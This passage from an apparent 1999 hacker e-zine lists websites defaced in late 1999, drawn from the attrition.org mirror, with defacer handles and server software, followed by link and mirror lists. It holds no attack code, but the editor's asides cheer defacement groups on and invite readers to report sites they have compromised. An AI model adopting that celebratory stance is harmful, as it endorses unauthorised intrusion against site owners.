wanna...yeah you do...make it fresh and new...be famous...<sic>
SITE.1
You can Send in submissions for this section too if you've found
(or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
___| _ \ |
| __| _` |\ \ / | | __| _ \ _` |
| | ( | ` < | | | __/ ( |
\____|_| \__,_| _/\_\\___/ _| \___|\__,_|
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.
>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
* Info supplied by the attrition.org mailing list.
Listed oldest to most recent...
Defaced domain: sony.com.pa
Site Title: Sony (Panama)
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.dellnet.com.br
Site Title: DellNet
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.dellnet.com.br
Defaced by: The Death Knights
Operating System: Linux
Defaced domain: www.gateway.com.my
Site Title: Gateway Malaysia
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.gateway.com.my
Defaced by: ieet
Operating System: Windows NT
Defaced domain: www.honda.com.kw
Site Title: Honda Korea
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.honda.com.kw
Defaced by: ytcracker
Operating System: Linux
Defaced domain: www.pcmac.com
Site Title: PC Mac Consultants
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.pcmac.com
Defaced by: cipher
Operating System: Windows NT
Defaced domain: homesandloansinc.com
Site Title: Homes And Loans Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/homesandloansinc.com
Defaced by: Tranzer
Operating System: Windows NT
Defaced domain: www.boobshack.com
Site Title: Boob Shack
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.boobshack.com
Defaced by: naptime
Operating System: Linux
Previously Hacked
Defaced domain: www.whitehousehistory.org
Site Title: The White House Historical Association
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whitehousehistory.org
Defaced by: Einstein
Operating System: Windows NT
Attrition comment: 2nd time hacked
Defaced domain: www.faculdadesantamarta.br
Site Title: Faculdade Santa Marta
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.faculdadesantamarta.br
Defaced by: The Death Knights
Operating System: Linux
Previously Hacked
Defaced domain: sony.com.pa
Site Title: Sony Panama
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa
Defaced by: Antichrist
Operating System: Windows NT
Attrition comment: 2nd time defaced
Defaced domain: www.ai-security.com
Site Title: AI Security Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.ai-security.com
Defaced by: g e n X h a k
Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6)
Previously Hacked
Defaced domain: www.monicalewinsky.com
Site Title: Monica Lewinsky's Web site
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.monicalewinsky.com
Defaced by: un1x bowling t34m
Operating System: BSDI
Attrition comment: 4th time defaced
Defaced domain: www.nissan.com.mx
Site Title: Nissan Mexico
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.nissan.com.mx
Defaced by: ytcracker
Operating System: Windows NT
Previously Hacked
Defaced domain: acquisition.jpl.nasa.gov
Site Title: Jet Propulsion Labs NASA
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/acquisition.jpl.nasa.gov
Defaced by: JLM
Operating System: Windows NT (IIS/4.0)
Attrition comment: Previously defaced on 99.10.26 by phreak.nl
Defaced domain: www.whataburger.com
Site Title: Whataburger Restaurants
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whataburger.com
Defaced by: klept0
Operating System: Linux
Defaced domain: www.asesor.com.pe
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.asesor.com.pe
Defaced by: xhostile/acidklown
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.spyconnection.com
Site Title: Spy Connection
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.spyconnection.com
Defaced by: `defcon
Operating System: BSDI
Defaced domain: www.wireless.ee
Site Title: Phreak.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.wireless.ee
Defaced by: Phreak.nl
Operating System: Windows 95
Defaced domain: www.oab.org.br
Site Title: Ordem dos Advogados do Brasil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.oab.org.br
Defaced by: inferno.br
Operating System: Windows NT
Defaced domain: www.fabrisia.com
Site Title: Fabrisia Cronin
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.fabrisia.com
Defaced by: Analognet
Operating System: Linux
Defaced domain: www.rayee.com
Site Title: Rayee
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.rayee.com
Defaced by: Analognet
Operating System: BSDI
Defaced domain: www.streamingcam.com
Site Title: Straming Cam
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.streamingcam.com
Defaced by: Analognet
Operating System: BSDI
Defaced domain: www.compunetcgi.com
Site Title: Compunet Computer Group
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.compunetcgi.com
Defaced by: Evil Entity
Operating System: Windows NT (IIS/4.0)
Defaced domain: whv1.warnervideo.com
Site Title: Warner Home Video
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/whv1.warnervideo.com
Defaced by: etC
Operating System: Solaris 2.5.x (Netscape-Enterprise/2.0a)
Defaced domain: www.dds.be
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.dds.be
Defaced by: sacudo69
Operating System: Irix (Rapidsite/Apa-1.3.4)
Previously Hacked
Defaced domain: www.hg.com.cn
Site Title: HG China
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.hg.com.cn
Defaced by: kryptek
Operating System: Solaris
Attrition comment: 2nd time defaced
HIDDEN comments in the HTML.
Previously Hacked
Defaced domain: www.nukleer.gov.tr
Site Title: Cekmece Nuclear Research and Training Center
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.nukleer.gov.tr
Defaced by: oystr-n-klam
Operating System: Linux
Attrition comment: 2nd time defaced
Defaced domain: www.latino-market.com
Site Title: Millennium Computers
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.latino-market.com
Defaced by: p4riah
Operating System: Windows NT
Defaced domain: bodystore.nu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/bodystore.nu
Defaced by: I.R.C.
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.investigationresources.com
Site Title: Investigative Resources Agency
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.investigationresources.com
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Attrition comment: mass hack
Previously Hacked
Defaced domain: www.esdcinc.com
Site Title: ESDC Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.esdcinc.com
Defaced by: Floghe
Operating System: Windows NT
Defaced domain: www.thomashosp.com
Site Title: Thomas Hosp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.thomashosp.com
Defaced by: w0lf
Operating System: Irix
Defaced domain: www.lottoteam.de
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.lottoteam.de
Defaced by: r00tabega
Operating System: Irix (Rapidsite/Apa-1.3.4)
Defaced domain: www.familyheartbeat.org
Site Title: electr0n
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.familyheartbeat.org
Defaced by: electr0n
Operating System: BSDI
Defaced domain: www.phifersystems.com
Site Title: Phifer Systems, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.phifersystems.com
Defaced by: ytcracker
Operating System: Linux
Defaced domain: www.barat.edu
Site Title: Barat College
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.barat.edu
Defaced by: phiber
Operating System: Windows NT
Defaced domain: west.medicdata.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/west.medicdata.com
Defaced by: ytcracker
Operating System: Red Hat Linux (Apache 1.3.6)
Defaced domain: www.car-4sale.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.car-4sale.com
Defaced by: ytcracker
Operating System: BSDI 3.0 (Apache 1.2.6)
Defaced domain: tfcnews.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/tfcnews.com
Defaced by: Hate Inc
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.ahcg.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.ahcg.com
Defaced by: xhostile & acidklown
Operating System: MacOS (AppleShareIP/6.0.0)
Defaced domain: www.globefilm.com.au
Site Title: Globe Film
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.globefilm.com.au
Defaced by: xhostile & acidk|own
Operating System: Windows NT
Defaced domain: www.calcapital.com
Site Title: Cal Capital
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.calcapital.com
Defaced by: hV2k
Operating System: BSDI
Defaced domain: stace.commed.ru
Site Title: Commed Web Hosting
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/stace.commed.ru
Defaced by: ytcracker
Operating System: Linux
Defaced domain: www.toystory2.net
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.toystory2.net
Defaced by: zeroc
Operating System: BSDI (Apache 1.3.6)
Defaced domain: www.uni-net.co.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.uni-net.co.uk
Defaced by: RETURN OF APOCALYPSE
Operating System: Solaris 2.6 - 2.7 (Apache 1.2.4)
HIDDEN comments in the HTML.
Previously Hacked
Defaced domain: www.lottoteam.de
Site Title: Lotto Team
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.lottoteam.de
Defaced by: Fuby
Operating System: Irox
Attrition comment: 2nd time defaced
HIDDEN comments in the HTML.
Defaced domain: www.m-hip.com
Site Title: McDermit Combined Schools
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.m-hip.com
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.pornography.com
Site Title: Atlantis Management Group
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.pornography.com
Defaced by: Sploit
Operating System: Windows NT (IIS/4.0)
Previously Hacked
Defaced domain: tfcnews.com
Site Title: TFC News
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/tfcnews.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Attrition comment: Yes, it really was hacked.
Defaced domain: unix.webgraphics.com
Site Title: Worldwide Web Graphics
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/unix.webgraphics.com
Defaced by: Nitr0BurN
Operating System: Linux (Apache 1.3.4)
Defaced domain: www.ivcsnet.net
Site Title: Imperial Valley Computer Service
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.ivcsnet.net
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Defaced domain: mars.assiniboinec.mb.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/mars.assiniboinec.mb.ca
Defaced by: nitroburn
Operating System: Linux (Apache 1.2.6)
Defaced domain: radius.preferred.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/radius.preferred.com
Defaced by: nitroburn
Operating System: Linux (Apache 1.3.3)
Defaced domain: www.socioambiental.org
Site Title: Instituto Socioambiental
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.socioambiental.org
Defaced by: c3zar
Operating System: Irix (Rapidsite/Apa-1.3.4)
Defaced domain: www.optimumsettings.com
Site Title: CEO Software, Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.optimumsettings.com
Defaced by: wkD
Operating System: Linux (Apache/1.3.4)
Defaced domain: coldwellbankerj-s.com
Site Title: Coldwell Banker Justrom & Stromme
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/coldwellbankerj-s.com
Defaced by: DHC
Operating System: Linux (Apache 1.2.4)
Defaced domain: www.themillcasino.com
Site Title: The Mill Casino
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.themillcasino.com
Defaced by: DHC
Operating System: Linux (Apache 1.2.4)
Defaced domain: www.pioneerimplement.com
Site Title: Pioneer Implement
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.pioneerimplement.com
Defaced by: DHC
Operating System: Linux (Apache 1.2.4)
Defaced domain: www.schedulerplus.com
Site Title: CEO Software
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.schedulerplus.com
Defaced by: wkD
Operating System: Linux (Apache 1.3.4)
Defaced domain: www.votedbest.com
Site Title: Irmo News
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.votedbest.com
Defaced by: Uneek
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.indev.nic.in
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.indev.nic.in
Defaced by: c0rvus
Operating System: Windows NT (IIS/4.0)
Defaced domain: beta.intuit.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/beta.intuit.com
Defaced by: Uneek Technologies
Operating System: Windows NT (WebSitePro/1.1h)
Defaced domain: www.css.com
Site Title: Consult Supply Support
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.css.com
Operating System: FreeBSD 2.2.1 - 3.0
Attrition comment: Defacement implies site was RM'd
Defaced domain: www.bhv.hn
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.bhv.hn
Defaced by: xhostile & acidklown
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.swoya.com
Site Title: Boys & Girls Club of Southwestern Oregon
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.swoya.com
Defaced by: DHC
Operating System: Linux
Defaced domain: www.mtb.gov.br
Site Title: Ministerio do Trabalho e do Emprego
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.mtb.gov.br
Defaced by: inferno.br
Operating System: Windows NT
Defaced domain: www.kdcq.com
Site Title: K-Dock Oldies 93.5
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.kdcq.com
Defaced by: DHC
Operating System: Linux
Defaced domain: www.trt6.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.trt6.gov.br
Defaced by: Einstein
Operating System: WinNT
Defaced domain: www.memphischamber.com
Site Title: Towery Publishing
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.memphischamber.com
Defaced by: bansh33 and Analognet
Operating System: Irix
Previously Hacked
Defaced domain: www.salton-maxim.com
Site Title: Samantha Dreimann
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.salton-maxim.com
Defaced by: p4riah
Operating System: WinNT
Previously Hacked
Defaced domain: www.hwa.net
Site Title: Hoefer WYSOCKI Architects
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.hwa.net
Defaced by: n4rfy
Operating System: WinNT
Defaced domain: www.cuztom.com
Site Title: Cuztom Incorporated
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.cuztom.com
Defaced by: cipher
Operating System: WinNT
Defaced domain: www.ordsvy.gov.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ordsvy.gov.uk
Defaced by: Sarin
Operating System: Windows NT (IIS/4.0)
HIDDEN comments in the HTML
Defaced domain: www.nctsjax.navy.mil
Site Title: Navy Computer and Telecommunications Station, Jacksonville, Florida
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.nctsjax.navy.mil
Defaced by: s01o and k-0s
Operating System: Windows NT
Defaced domain: aoc.gov
Site Title: The Architect of the United States Capitol
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/aoc.gov
Defaced by: Verb0
Operating System: Windows NT
Defaced domain: cpma.apg.army.mil
Site Title: Civilian Personnel Operations Center Management Agency
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/cpma.apg.army.mil
Defaced by: s01o and k-0s
Operating System: Windows NT
Previously Hacked
Defaced domain: www.learncomm.org
Site Title: Kiel Woodward Associates
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.learncomm.org
Defaced by: DHC
Operating System: Irix
Defaced domain: www.zetcom.ru
Site Title: Zetcom
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.zetcom.ru
Defaced by: Z0omer
Operating System: Windows NT
Previously Hacked
Defaced domain: www.pietersburg.org.za
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.pietersburg.org.za
Defaced by: aKt0r & DajinX
Operating System: Windows NT (IIS/4.0)
Attrition comment: Previously defaced on 99.09.18 by 139_r00ted - one of 11 .za domains hacked
Previously Hacked
Defaced domain: www.asesor.com.pe
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.asesor.com.pe
Defaced by: bean0
Operating System: Windows NT (IIS/4.0)
Attrition comment: Previously defaced on 99.11.29 by acidkl0wn
Defaced domain: www.colts.com
Site Title: National Football League
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.colts.com
Defaced by: Tr1pl3 S31S
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.isaltda.com.uy
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.isaltda.com.uy
Defaced by: m0zy
Operating System: Windows NT (Lotus-Domino/Versión-4.6.3a)
Defaced domain: www.ta-eng.com
Site Title: TA Engineering
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ta-eng.com
Defaced by: himi
Operating System: Windows NT (IIS/4.0)
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file; there is now a links
section at the http://welcome.to/HWA.hax0r.news/ URL, so check there
for current links.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondents and others, please send in links to news sites
that carry security news from foreign countries for inclusion in this
list, thanks... - Ed
Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada........: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland.......: http://hackunlimited.com/
Germany.......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa..: http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                and best security related e-zine.
.za (South Africa) sites contributed by wyzwun, tnx guy...
Got a link for this section? Email it to hwa@press.usmc.net and I'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]